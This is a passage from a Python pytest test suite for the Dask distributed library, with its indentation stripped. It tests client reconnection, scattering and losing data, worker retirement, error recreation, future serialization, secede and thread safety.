start = time()
while c.status != "connecting":
assert time() < start + 5
sleep(0.01)
assert x.status == "cancelled"
with pytest.raises(CancelledError):
x.result()
with popen(scheduler_cli) as s:
start = time()
while c.status != "running":
sleep(0.1)
assert time() < start + 5
start = time()
while len(c.nthreads()) != 1:
sleep(0.05)
assert time() < start + 15
x = c.submit(inc, 1)
assert x.result() == 2
start = time()
while True:
try:
x.result()
assert False
except CommClosedError:
continue
except CancelledError:
break
assert time() < start + 5
sleep(0.1)
sync(loop, w.close)
c.close()
@gen_cluster(client=True, nthreads=[], client_kwargs={"timeout": 0.5})
async def test_reconnect_timeout(c, s):
with captured_logger(logging.getLogger("distributed.client")) as logger:
await s.close()
start = time()
while c.status != "closed":
await c._update_scheduler_info()
await asyncio.sleep(0.05)
assert time() < start + 5, "Timeout waiting for reconnect to fail"
text = logger.getvalue()
assert "Failed to reconnect" in text
@pytest.mark.slow
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
@pytest.mark.skipif(sys.version_info < (3, 7), reason="TODO: intermittent failures")
@pytest.mark.parametrize("worker,count,repeat", [(Worker, 100, 5), (Nanny, 10, 20)])
def test_open_close_many_workers(loop, worker, count, repeat):
psutil = pytest.importorskip("psutil")
proc = psutil.Process()
with cluster(nworkers=0, active_rpc_timeout=2) as (s, _):
gc.collect()
before = proc.num_fds()
done = Semaphore(0)
running = weakref.WeakKeyDictionary()
workers = set()
status = True
async def start_worker(sleep, duration, repeat=1):
for i in range(repeat):
await asyncio.sleep(sleep)
if not status:
return
w = worker(s["address"], loop=loop)
running[w] = None
await w
workers.add(w)
addr = w.worker_address
running[w] = addr
await asyncio.sleep(duration)
await w.close()
del w
await asyncio.sleep(0)
done.release()
for i in range(count):
loop.add_callback(
start_worker, random.random() / 5, random.random() / 5, repeat=repeat
)
with Client(s["address"], loop=loop) as c:
sleep(1)
for i in range(count):
done.acquire(timeout=5)
gc.collect()
if not running:
break
start = time()
while c.nthreads():
sleep(0.2)
assert time() < start + 10
while len(workers) < count * repeat:
sleep(0.2)
status = False
[c.sync(w.close) for w in list(workers)]
for w in workers:
assert w.status == "closed"
start = time()
while proc.num_fds() > before:
print("fds:", before, proc.num_fds())
sleep(0.1)
assert time() < start + 10
@gen_cluster(client=False, timeout=None)
async def test_idempotence(s, a, b):
c = await Client(s.address, asynchronous=True)
f = await Client(s.address, asynchronous=True)
# Submit
x = c.submit(inc, 1)
await x
log = list(s.transition_log)
len_single_submit = len(log) # see last assert
y = f.submit(inc, 1)
assert x.key == y.key
await y
await asyncio.sleep(0.1)
log2 = list(s.transition_log)
assert log == log2
# Error
a = c.submit(div, 1, 0)
await wait(a)
assert a.status == "error"
log = list(s.transition_log)
b = f.submit(div, 1, 0)
assert a.key == b.key
await wait(b)
await asyncio.sleep(0.1)
log2 = list(s.transition_log)
assert log == log2
s.transition_log.clear()
# Simultaneous Submit
d = c.submit(inc, 2)
e = c.submit(inc, 2)
await wait([d, e])
assert len(s.transition_log) == len_single_submit
await c.close()
await f.close()
def test_scheduler_info(c):
info = c.scheduler_info()
assert isinstance(info, dict)
assert len(info["workers"]) == 2
def test_write_scheduler_file(c):
info = c.scheduler_info()
with tmpfile("json") as scheduler_file:
c.write_scheduler_file(scheduler_file)
with Client(scheduler_file=scheduler_file) as c2:
info2 = c2.scheduler_info()
assert c.scheduler.address == c2.scheduler.address
# test that a ValueError is raised if the scheduler_file
# attribute is already set
with pytest.raises(ValueError):
c.write_scheduler_file(scheduler_file)
def test_get_versions(c):
requests = pytest.importorskip("requests")
v = c.get_versions()
assert v["scheduler"] is not None
assert v["client"] is not None
assert len(v["workers"]) == 2
for k, v in v["workers"].items():
assert v is not None
c.get_versions(check=True)
# smoke test for versions
# that this does not raise
v = c.get_versions(packages=["requests"])
assert v["client"]["packages"]["requests"] == requests.__version__
@gen_cluster(client=True)
async def test_async_get_versions(c, s, a, b):
await c.get_versions(check=True)
def test_threaded_get_within_distributed(c):
import dask.multiprocessing
for get in [dask.local.get_sync, dask.multiprocessing.get, dask.threaded.get]:
def f():
return get({"x": (lambda: 1,)}, "x")
future = c.submit(f)
assert future.result() == 1
@gen_cluster(client=True)
async def test_lose_scattered_data(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
await a.close()
await asyncio.sleep(0.1)
assert x.status == "cancelled"
assert x.key not in s.tasks
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 3)
async def test_partially_lose_scattered_data(e, s, a, b, c):
x = await e.scatter(1, workers=a.address)
await e.replicate(x, n=2)
await a.close()
await asyncio.sleep(0.1)
assert x.status == "finished"
assert s.get_task_status(keys=[x.key]) == {x.key: "memory"}
@gen_cluster(client=True)
async def test_scatter_compute_lose(c, s, a, b):
[x] = await c.scatter([[1, 2, 3, 4]], workers=a.address)
y = c.submit(inc, 1, workers=b.address)
z = c.submit(slowadd, x, y, delay=0.2)
await asyncio.sleep(0.1)
await a.close()
with pytest.raises(CancelledError):
await wait(z)
assert x.status == "cancelled"
assert y.status == "finished"
assert z.status == "cancelled"
@gen_cluster(client=True)
async def test_scatter_compute_store_lose(c, s, a, b):
"""
Create irreplaceable data on one machine,
cause a dependent computation to occur on another and complete
Kill the machine with the irreplaceable data. What happens to the complete
result? How about after it GCs and tries to come back?
"""
x = await c.scatter(1, workers=a.address)
xx = c.submit(inc, x, workers=a.address)
y = c.submit(inc, 1)
z = c.submit(slowadd, xx, y, delay=0.2, workers=b.address)
await wait(z)
await a.close()
start = time()
while x.status == "finished":
await asyncio.sleep(0.01)
assert time() < start + 2
# assert xx.status == 'finished'
assert y.status == "finished"
assert z.status == "finished"
zz = c.submit(inc, z)
await wait(zz)
zkey = z.key
del z
start = time()
while s.get_task_status(keys=[zkey]) != {zkey: "released"}:
await asyncio.sleep(0.01)
assert time() < start + 2
xxkey = xx.key
del xx
start = time()
while x.key in s.tasks and zkey not in s.tasks and xxkey not in s.tasks:
await asyncio.sleep(0.01)
assert time() < start + 2
@gen_cluster(client=True)
async def test_scatter_compute_store_lose_processing(c, s, a, b):
"""
Create irreplaceable data on one machine,
cause a dependent computation to occur on another and complete
Kill the machine with the irreplaceable data. What happens to the complete
result? How about after it GCs and tries to come back?
"""
[x] = await c.scatter([1], workers=a.address)
y = c.submit(slowinc, x, delay=0.2)
z = c.submit(inc, y)
await asyncio.sleep(0.1)
await a.close()
start = time()
while x.status == "finished":
await asyncio.sleep(0.01)
assert time() < start + 2
assert y.status == "cancelled"
assert z.status == "cancelled"
@gen_cluster(client=False)
async def test_serialize_future(s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
future = c1.submit(lambda: 1)
result = await future
for ci in (c1, c2):
for ctxman in ci.as_current, lambda: temp_default_client(ci):
with ctxman():
future2 = pickle.loads(pickle.dumps(future))
assert future2.client is ci
assert tokey(future2.key) in ci.futures
result2 = await future2
assert result == result2
await c1.close()
await c2.close()
@gen_cluster(client=False)
async def test_temp_default_client(s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
with temp_default_client(c1):
assert default_client() is c1
assert default_client(c2) is c2
with temp_default_client(c2):
assert default_client() is c2
assert default_client(c1) is c1
await c1.close()
await c2.close()
@gen_cluster(client=True)
async def test_as_current(c, s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
with temp_default_client(c):
assert Client.current() is c
with pytest.raises(ValueError):
Client.current(allow_global=False)
with c1.as_current():
assert Client.current() is c1
assert Client.current(allow_global=True) is c1
with c2.as_current():
assert Client.current() is c2
assert Client.current(allow_global=True) is c2
await c1.close()
await c2.close()
def test_as_current_is_thread_local(s):
l1 = threading.Lock()
l2 = threading.Lock()
l3 = threading.Lock()
l4 = threading.Lock()
l1.acquire()
l2.acquire()
l3.acquire()
l4.acquire()
def run1():
with Client(s.address) as c:
with c.as_current():
l1.acquire()
l2.release()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
l3.acquire()
l4.release()
def run2():
with Client(s.address) as c:
with c.as_current():
l1.release()
l2.acquire()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
l3.release()
l4.acquire()
t1 = threading.Thread(target=run1)
t2 = threading.Thread(target=run2)
t1.start()
t2.start()
t1.join()
t2.join()
@pytest.mark.xfail(
sys.version_info < (3, 7),
reason="Python 3.6 contextvars are not copied on Task creation",
)
@gen_cluster(client=False)
async def test_as_current_is_task_local(s, a, b):
l1 = asyncio.Lock()
l2 = asyncio.Lock()
l3 = asyncio.Lock()
l4 = asyncio.Lock()
await l1.acquire()
await l2.acquire()
await l3.acquire()
await l4.acquire()
async def run1():
async with Client(s.address, asynchronous=True) as c:
with c.as_current():
await l1.acquire()
l2.release()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
await l3.acquire()
l4.release()
async def run2():
async with Client(s.address, asynchronous=True) as c:
with c.as_current():
l1.release()
await l2.acquire()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
l3.release()
await l4.acquire()
await asyncio.gather(run1(), run2())
@nodebug # test timing is fragile
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_persist_workers(e, s, a, b, c):
L1 = [delayed(inc)(i) for i in range(4)]
total = delayed(sum)(L1)
L2 = [delayed(add)(i, total) for i in L1]
total2 = delayed(sum)(L2)
out = e.persist(
L1 + L2 + [total, total2],
workers={
tuple(L1): a.address,
total: b.address,
tuple(L2): [c.address],
total2: b.address,
},
allow_other_workers=L2 + [total2],
)
await wait(out)
assert all(v.key in a.data for v in L1)
assert total.key in b.data
assert s.loose_restrictions == {total2.key} | {v.key for v in L2}
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_compute_workers(e, s, a, b, c):
L1 = [delayed(inc)(i) for i in range(4)]
total = delayed(sum)(L1)
L2 = [delayed(add)(i, total) for i in L1]
out = e.compute(
L1 + L2 + [total],
workers={tuple(L1): a.address, total: b.address, tuple(L2): [c.address]},
allow_other_workers=L1 + [total],
)
await wait(out)
for v in L1:
assert s.worker_restrictions[v.key] == {a.address}
for v in L2:
assert s.worker_restrictions[v.key] == {c.address}
assert s.worker_restrictions[total.key] == {b.address}
assert s.loose_restrictions == {total.key} | {v.key for v in L1}
@gen_cluster(client=True)
async def test_compute_nested_containers(c, s, a, b):
da = pytest.importorskip("dask.array")
np = pytest.importorskip("numpy")
x = da.ones(10, chunks=(5,)) + 1
future = c.compute({"x": [x], "y": 123})
result = await future
assert isinstance(result, dict)
assert (result["x"][0] == np.ones(10) + 1).all()
assert result["y"] == 123
def test_get_restrictions():
L1 = [delayed(inc)(i) for i in range(4)]
total = delayed(sum)(L1)
L2 = [delayed(add)(i, total) for i in L1]
r1, loose = Client.get_restrictions(L2, "127.0.0.1", False)
assert r1 == {d.key: ["127.0.0.1"] for d in L2}
assert not loose
r1, loose = Client.get_restrictions(L2, ["127.0.0.1"], True)
assert r1 == {d.key: ["127.0.0.1"] for d in L2}
assert set(loose) == {d.key for d in L2}
r1, loose = Client.get_restrictions(L2, {total: "127.0.0.1"}, True)
assert r1 == {total.key: ["127.0.0.1"]}
assert loose == [total.key]
r1, loose = Client.get_restrictions(L2, {(total,): "127.0.0.1"}, True)
assert r1 == {total.key: ["127.0.0.1"]}
assert loose == [total.key]
@gen_cluster(client=True)
async def test_scatter_type(c, s, a, b):
[future] = await c.scatter([1])
assert future.type == int
d = await c.scatter({"x": 1.0})
assert d["x"].type == float
@gen_cluster(client=True)
async def test_retire_workers_2(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
await s.retire_workers(workers=[a.address])
assert b.data == {x.key: 1}
assert s.who_has == {x.key: {b.address}}
assert s.has_what == {b.address: {x.key}}
assert a.address not in s.workers
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_retire_many_workers(c, s, *workers):
futures = await c.scatter(list(range(100)))
await s.retire_workers(workers=[w.address for w in workers[:7]])
results = await c.gather(futures)
assert results == list(range(100))
while len(s.workers) != 3:
await asyncio.sleep(0.01)
assert len(s.has_what) == len(s.nthreads) == 3
assert all(future.done() for future in futures)
assert all(s.tasks[future.key].state == "memory" for future in futures)
for w, keys in s.has_what.items():
assert 15 < len(keys) < 50
@gen_cluster(
client=True,
nthreads=[("127.0.0.1", 3)] * 2,
config={"distributed.scheduler.default-task-durations": {"f": "10ms"}},
)
async def test_weight_occupancy_against_data_movement(c, s, a, b):
s.extensions["stealing"]._pc.callback_time = 1000000
def f(x, y=0, z=0):
sleep(0.01)
return x
y = await c.scatter([[1, 2, 3, 4]], workers=[a.address])
z = await c.scatter([1], workers=[b.address])
futures = c.map(f, [1, 2, 3, 4], y=y, z=z)
await wait(futures)
assert sum(f.key in a.data for f in futures) >= 2
assert sum(f.key in b.data for f in futures) >= 1
@gen_cluster(
client=True,
nthreads=[("127.0.0.1", 1), ("127.0.0.1", 10)],
config={"distributed.scheduler.default-task-durations": {"f": "10ms"}},
)
async def test_distribute_tasks_by_nthreads(c, s, a, b):
s.extensions["stealing"]._pc.callback_time = 1000000
def f(x, y=0):
sleep(0.01)
return x
y = await c.scatter([1], broadcast=True)
futures = c.map(f, range(20), y=y)
await wait(futures)
assert len(b.data) > 2 * len(a.data)
@gen_cluster(client=True, clean_kwargs={"threads": False})
async def test_add_done_callback(c, s, a, b):
S = set()
def f(future):
future.add_done_callback(g)
def g(future):
S.add((future.key, future.status))
u = c.submit(inc, 1, key="u")
v = c.submit(throws, "hello", key="v")
w = c.submit(slowinc, 2, delay=0.3, key="w")
x = c.submit(inc, 3, key="x")
u.add_done_callback(f)
v.add_done_callback(f)
w.add_done_callback(f)
await wait((u, v, w, x))
x.add_done_callback(f)
t = time()
while len(S) < 4 and time() - t < 2.0:
await asyncio.sleep(0.01)
assert S == {(f.key, f.status) for f in (u, v, w, x)}
@gen_cluster(client=True)
async def test_normalize_collection(c, s, a, b):
x = delayed(inc)(1)
y = delayed(inc)(x)
z = delayed(inc)(y)
yy = c.persist(y)
zz = c.normalize_collection(z)
assert len(z.dask) == len(y.dask) + 1
assert isinstance(zz.dask[y.key], Future)
assert len(zz.dask) < len(z.dask)
@gen_cluster(client=True)
async def test_normalize_collection_dask_array(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=(5,))
y = x + 1
yy = c.persist(y)
z = y.sum()
zdsk = dict(z.dask)
zz = c.normalize_collection(z)
assert z.dask == zdsk # do not mutate input
assert len(z.dask) > len(zz.dask)
assert any(isinstance(v, Future) for v in zz.dask.values())
for k, v in yy.dask.items():
assert zz.dask[k].key == v.key
result1 = await c.compute(z)
result2 = await c.compute(zz)
assert result1 == result2
@pytest.mark.slow
def test_normalize_collection_with_released_futures(c):
da = pytest.importorskip("dask.array")
x = da.arange(2 ** 20, chunks=2 ** 10)
y = x.persist()
wait(y)
sol = y.sum().compute()
# Start releasing futures
del y
# Try to reuse futures. Previously this was a race condition,
# and the call to `.compute()` would error out due to missing
# futures on the scheduler at compute time.
normalized = c.normalize_collection(x)
res = normalized.sum().compute()
assert res == sol
@gen_cluster(client=True)
async def test_auto_normalize_collection(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=5)
assert len(x.dask) == 2
with dask.config.set(optimizations=[c._optimize_insert_futures]):
y = x.map_blocks(slowinc, delay=1, dtype=x.dtype)
yy = c.persist(y)
await wait(yy)
start = time()
future = c.compute(y.sum())
await future
end = time()
assert end - start < 1
start = time()
z = c.persist(y + 1)
await wait(z)
end = time()
assert end - start < 1
def test_auto_normalize_collection_sync(c):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=5)
y = x.map_blocks(slowinc, delay=1, dtype=x.dtype)
yy = c.persist(y)
wait(yy)
with dask.config.set(optimizations=[c._optimize_insert_futures]):
start = time()
y.sum().compute()
end = time()
assert end - start < 1
def assert_no_data_loss(scheduler):
for key, start, finish, recommendations, _ in scheduler.transition_log:
if start == "memory" and finish == "released":
for k, v in recommendations.items():
assert not (k == key and v == "waiting")
@gen_cluster(client=True, timeout=None)
async def test_interleave_computations(c, s, a, b):
import distributed
distributed.g = s
xs = [delayed(slowinc)(i, delay=0.02) for i in range(30)]
ys = [delayed(slowdec)(x, delay=0.02) for x in xs]
zs = [delayed(slowadd)(x, y, delay=0.02) for x, y in zip(xs, ys)]
total = delayed(sum)(zs)
future = c.compute(total)
done = ("memory", "released")
await asyncio.sleep(0.1)
x_keys = [x.key for x in xs]
y_keys = [y.key for y in ys]
z_keys = [z.key for z in zs]
while not s.tasks or any(w.processing for w in s.workers.values()):
await asyncio.sleep(0.05)
x_done = sum(state in done for state in s.get_task_status(keys=x_keys).values())
y_done = sum(state in done for state in s.get_task_status(keys=y_keys).values())
z_done = sum(state in done for state in s.get_task_status(keys=z_keys).values())
assert x_done >= y_done >= z_done
assert x_done < y_done + 10
assert y_done < z_done + 10
assert_no_data_loss(s)
@pytest.mark.skip(reason="Now prefer first-in-first-out")
@gen_cluster(client=True, timeout=None)
async def test_interleave_computations_map(c, s, a, b):
xs = c.map(slowinc, range(30), delay=0.02)
ys = c.map(slowdec, xs, delay=0.02)
zs = c.map(slowadd, xs, ys, delay=0.02)
done = ("memory", "released")
x_keys = [x.key for x in xs]
y_keys = [y.key for y in ys]
z_keys = [z.key for z in zs]
while not s.tasks or any(w.processing for w in s.workers.values()):
await asyncio.sleep(0.05)
x_done = sum(state in done for state in s.get_task_status(keys=x_keys).values())
y_done = sum(state in done for state in s.get_task_status(keys=y_keys).values())
z_done = sum(state in done for state in s.get_task_status(keys=z_keys).values())
assert x_done >= y_done >= z_done
assert x_done < y_done + 10
assert y_done < z_done + 10
@gen_cluster(client=True)
async def test_scatter_dict_workers(c, s, a, b):
await c.scatter({"a": 10}, workers=[a.address, b.address])
assert "a" in a.data or "a" in b.data
@pytest.mark.slow
@gen_test()
async def test_client_timeout():
c = Client("127.0.0.1:57484", asynchronous=True)
s = Scheduler(loop=c.loop, port=57484)
await asyncio.sleep(4)
try:
await s
except EnvironmentError: # port in use
await c.close()
return
start = time()
await c
try:
assert time() < start + 2
finally:
await c.close()
await s.close()
@gen_cluster(client=True)
async def test_submit_list_kwargs(c, s, a, b):
futures = await c.scatter([1, 2, 3])
def f(L=None):
return sum(L)
future = c.submit(f, L=futures)
result = await future
assert result == 1 + 2 + 3
@gen_cluster(client=True)
async def test_map_list_kwargs(c, s, a, b):
futures = await c.scatter([1, 2, 3])
def f(i, L=None):
return i + sum(L)
futures = c.map(f, range(10), L=futures)
results = await c.gather(futures)
assert results == [i + 6 for i in range(10)]
@gen_cluster(client=True)
async def test_dont_clear_waiting_data(c, s, a, b):
start = time()
x = await c.scatter(1)
y = c.submit(slowinc, x, delay=0.5)
while y.key not in s.tasks:
await asyncio.sleep(0.01)
key = x.key
del x
for i in range(5):
assert s.waiting_data[key]
await asyncio.sleep(0)
@gen_cluster(client=True)
async def test_get_future_error_simple(c, s, a, b):
f = c.submit(div, 1, 0)
await wait(f)
assert f.status == "error"
function, args, kwargs, deps = await c._get_futures_error(f)
# args contains only solid values, not keys
assert function.__name__ == "div"
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
@gen_cluster(client=True)
async def test_get_futures_error(c, s, a, b):
x0 = delayed(dec)(2, dask_key_name="x0")
y0 = delayed(dec)(1, dask_key_name="y0")
x = delayed(div)(1, x0, dask_key_name="x")
y = delayed(div)(1, y0, dask_key_name="y")
tot = delayed(sum)(x, y, dask_key_name="tot")
f = c.compute(tot)
await wait(f)
assert f.status == "error"
function, args, kwargs, deps = await c._get_futures_error(f)
assert function.__name__ == "div"
assert args == (1, y0.key)
@gen_cluster(client=True)
async def test_recreate_error_delayed(c, s, a, b):
x0 = delayed(dec)(2)
y0 = delayed(dec)(1)
x = delayed(div)(1, x0)
y = delayed(div)(1, y0)
tot = delayed(sum)(x, y)
f = c.compute(tot)
assert f.status == "pending"
function, args, kwargs = await c._recreate_error_locally(f)
assert f.status == "error"
assert function.__name__ == "div"
assert args == (1, 0)
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
@gen_cluster(client=True)
async def test_recreate_error_futures(c, s, a, b):
x0 = c.submit(dec, 2)
y0 = c.submit(dec, 1)
x = c.submit(div, 1, x0)
y = c.submit(div, 1, y0)
tot = c.submit(sum, x, y)
f = c.compute(tot)
assert f.status == "pending"
function, args, kwargs = await c._recreate_error_locally(f)
assert f.status == "error"
assert function.__name__ == "div"
assert args == (1, 0)
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
@gen_cluster(client=True)
async def test_recreate_error_collection(c, s, a, b):
b = db.range(10, npartitions=4)
b = b.map(lambda x: 1 / x)
b = b.persist()
f = c.compute(b)
function, args, kwargs = await c._recreate_error_locally(f)
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
dd = pytest.importorskip("dask.dataframe")
import pandas as pd
df = dd.from_pandas(pd.DataFrame({"a": [0, 1, 2, 3, 4]}), chunksize=2)
def make_err(x):
# because pandas would happily work with NaN
if x == 0:
raise ValueError
return x
df2 = df.a.map(make_err)
f = c.compute(df2)
function, args, kwargs = await c._recreate_error_locally(f)
with pytest.raises(ValueError):
function(*args, **kwargs)
# with persist
df3 = c.persist(df2)
function, args, kwargs = await c._recreate_error_locally(df3)
with pytest.raises(ValueError):
function(*args, **kwargs)
@gen_cluster(client=True)
async def test_recreate_error_array(c, s, a, b):
da = pytest.importorskip("dask.array")
pytest.importorskip("scipy")
z = (da.linalg.inv(da.zeros((10, 10), chunks=10)) + 1).sum()
zz = z.persist()
func, args, kwargs = await c._recreate_error_locally(zz)
assert "0.,0.,0." in str(args).replace(" ", "") # args contain actual arrays
def test_recreate_error_sync(c):
x0 = c.submit(dec, 2)
y0 = c.submit(dec, 1)
x = c.submit(div, 1, x0)
y = c.submit(div, 1, y0)
tot = c.submit(sum, x, y)
f = c.compute(tot)
with pytest.raises(ZeroDivisionError):
c.recreate_error_locally(f)
assert f.status == "error"
def test_recreate_error_not_error(c):
f = c.submit(dec, 2)
with pytest.raises(ValueError, match="No errored futures passed"):
c.recreate_error_locally(f)
@gen_cluster(client=True)
async def test_retire_workers(c, s, a, b):
assert set(s.workers) == {a.address, b.address}
await c.retire_workers(workers=[a.address], close_workers=True)
assert set(s.workers) == {b.address}
start = time()
while a.status != "closed":
await asyncio.sleep(0.01)
assert time() < start + 5
class MyException(Exception):
pass
@gen_cluster(client=True)
async def test_robust_unserializable(c, s, a, b):
class Foo:
def __getstate__(self):
raise MyException()
with pytest.raises(MyException):
future = c.submit(identity, Foo())
futures = c.map(inc, range(10))
results = await c.gather(futures)
assert results == list(map(inc, range(10)))
assert a.data and b.data
@gen_cluster(client=True)
async def test_robust_undeserializable(c, s, a, b):
class Foo:
def __getstate__(self):
return 1
def __setstate__(self, state):
raise MyException("hello")
future = c.submit(identity, Foo())
with pytest.raises(MyException):
await future
futures = c.map(inc, range(10))
results = await c.gather(futures)
assert results == list(map(inc, range(10)))
assert a.data and b.data
@gen_cluster(client=True)
async def test_robust_undeserializable_function(c, s, a, b):
class Foo:
def __getstate__(self):
return 1
def __setstate__(self, state):
raise MyException("hello")
def __call__(self, *args):
return 1
future = c.submit(Foo(), 1)
with pytest.raises(MyException):
await future
futures = c.map(inc, range(10))
results = await c.gather(futures)
assert results == list(map(inc, range(10)))
assert a.data and b.data
@gen_cluster(client=True)
async def test_fire_and_forget(c, s, a, b):
future = c.submit(slowinc, 1, delay=0.1)
import distributed
def f(x):
distributed.foo = 123
try:
fire_and_forget(c.submit(f, future))
start = time()
while not hasattr(distributed, "foo"):
await asyncio.sleep(0.01)
assert time() < start + 2
assert distributed.foo == 123
finally:
del distributed.foo
start = time()
while len(s.tasks) > 1:
await asyncio.sleep(0.01)
assert time() < start + 2
assert set(s.who_wants) == {future.key}
assert set(s.tasks) == {future.key}
@gen_cluster(client=True)
async def test_fire_and_forget_err(c, s, a, b):
fire_and_forget(c.submit(div, 1, 0))
await asyncio.sleep(0.1)
# erred task should clear out quickly
start = time()
while s.tasks:
await asyncio.sleep(0.01)
assert time() < start + 1
def test_quiet_client_close(loop):
with captured_logger(logging.getLogger("distributed")) as logger:
with Client(loop=loop, processes=False, threads_per_worker=4) as c:
futures = c.map(slowinc, range(1000), delay=0.01)
sleep(0.200) # stop part-way
sleep(0.1) # let things settle
out = logger.getvalue()
lines = out.strip().split("\n")
assert len(lines) <= 2
for line in lines:
assert (
not line
or "Reconnecting" in line
or "garbage" in line
or set(line) == {"-"}
), line
@pytest.mark.slow
def test_quiet_client_close_when_cluster_is_closed_before_client(loop):
with captured_logger(logging.getLogger("tornado.application")) as logger:
cluster = LocalCluster(loop=loop, n_workers=1, dashboard_address=":0")
client = Client(cluster, loop=loop)
cluster.close()
client.close()
out = logger.getvalue()
assert "CancelledError" not in out
@gen_cluster()
async def test_close(s, a, b):
c = await Client(s.address, asynchronous=True)
future = c.submit(inc, 1)
await wait(future)
assert c.id in s.wants_what
await c.close()
start = time()
while c.id in s.wants_what or s.tasks:
await asyncio.sleep(0.01)
assert time() < start + 5
def test_threadsafe(c):
def f(_):
d = deque(maxlen=50)
for i in range(100):
future = c.submit(inc, random.randint(0, 100))
d.append(future)
sleep(0.001)
c.gather(list(d))
total = c.submit(sum, list(d))
return total.result()
from concurrent.futures import ThreadPoolExecutor
with ThreadPoolExecutor(20) as e:
results = list(e.map(f, range(20)))
assert results and all(results)
del results
@pytest.mark.slow
def test_threadsafe_get(c):
da = pytest.importorskip("dask.array")
x = da.arange(100, chunks=(10,))
def f(_):
total = 0
for i in range(20):
total += (x + random.randint(0, 20)).sum().compute()
sleep(0.001)
return total
from concurrent.futures import ThreadPoolExecutor
with ThreadPoolExecutor(30) as e:
results = list(e.map(f, range(30)))
assert results and all(results)
@pytest.mark.slow
def test_threadsafe_compute(c):
da = pytest.importorskip("dask.array")
x = da.arange(100, chunks=(10,))
def f(_):
total = 0
for i in range(20):
future = c.compute((x + random.randint(0, 20)).sum())
total += future.result()
sleep(0.001)
return total
from concurrent.futures import ThreadPoolExecutor
e = ThreadPoolExecutor(30)
results = list(e.map(f, range(30)))
assert results and all(results)
@gen_cluster(client=True)
async def test_identity(c, s, a, b):
assert c.id.lower().startswith("client")
assert a.id.lower().startswith("worker")
assert b.id.lower().startswith("worker")
assert s.id.lower().startswith("scheduler")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 4)] * 2)
async def test_get_client(c, s, a, b):
assert get_client() is c
assert c.asynchronous
def f(x):
client = get_client()
future = client.submit(inc, x)
import distributed
assert not client.asynchronous
assert client is distributed.tmp_client
return future.result()
import distributed
distributed.tmp_client = c
try:
futures = c.map(f, range(5))
results = await c.gather(futures)
assert results == list(map(inc, range(5)))
finally:
del distributed.tmp_client
def test_get_client_no_cluster():
# Clean up any global workers added by other tests. This test requires that
# there are no global workers.
Worker._instances.clear()
msg = "No global client found and no address provided"
with pytest.raises(ValueError, match=r"^{}$".format(msg)):
get_client()
@gen_cluster(client=True)
async def test_serialize_collections(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.arange(10, chunks=(5,)).persist()
def f(x):
assert isinstance(x, da.Array)
return x.sum().compute()
future = c.submit(f, x)
result = await future
assert result == sum(range(10))
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 1, timeout=100)
async def test_secede_simple(c, s, a):
def f():
client = get_client()
secede()
return client.submit(inc, 1).result()
result = await c.submit(f)
assert result == 2
@pytest.mark.slow
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 2, timeout=60)
async def test_secede_balances(c, s, a, b):
count = threading.active_count()
def f(x):
client = get_client()
sleep(0.01) # do some work
secede()
futures = client.map(slowinc, range(10), pure=False, delay=0.01)
total = client.submit(sum, futures).result()
return total
futures = c.map(f, range(100))
start = time()
while not all(f.status == "finished" for f in futures):
await asyncio.sleep(0.01)
assert threading.active_count() < count + 50
assert len(a.log) < 2 * len(b.log)
assert len(b.log) < 2 * len(a.log)
results = await c.gather(futures)
assert results == [sum(map(inc, range(10)))] * 100
@gen_cluster(client=True)
async def test_sub_submit_priority(c, s, a, b):
def f():
client = get_client()
client.submit(slowinc, 1, delay=0.2, key="slowinc")
future = c.submit(f, key="f")
await asyncio.sleep(0.1)
if len(s.tasks) == 2:
assert (
s.priorities["f"] > s.priorities["slowinc"]
) # lower values schedule first
def test_get_client_sync(c, s, a, b):
results = c.run(lambda: get_worker().scheduler.address)
assert results == {w["address"]: s["address"] for w in [a, b]}
results = c.run(lambda: get_client().scheduler.address)
assert results == {w["address"]: s["address"] for w in [a, b]}
@gen_cluster(client=True)
async def test_serialize_collections_of_futures(c, s, a, b):
pd = pytest.importorskip("pandas")
dd = pytest.importorskip("dask.dataframe")
from dask.dataframe.utils import assert_eq
df = pd.DataFrame({"x": [1, 2, 3]})
ddf = dd.from_pandas(df, npartitions=2).persist()
future = await c.scatter(ddf)
ddf2 = await future
df2 = await c.compute(ddf2)
assert_eq(df, df2)
def test_serialize_collections_of_futures_sync(c):
pd = pytest.importorskip("pandas")
dd = pytest.importorskip("dask.dataframe")
from dask.dataframe.utils import assert_eq
df = pd.DataFrame({"x": [1, 2, 3]})
ddf = dd.from_pandas(df, npartitions=2).persist()
future = c.scatter(ddf)
result = future.result()
assert_eq(result.compute(), df)
assert future.type == dd.DataFrame
assert c.submit(lambda x, y: assert_eq(x.compute(), y), future, df).result()
def _dynamic_workload(x, delay=0.01):
if delay == "random":
sleep(random.random() / 2)
else:
sleep(delay)
if x > 4:
return 4
secede()
client = get_client()
futures = client.map(
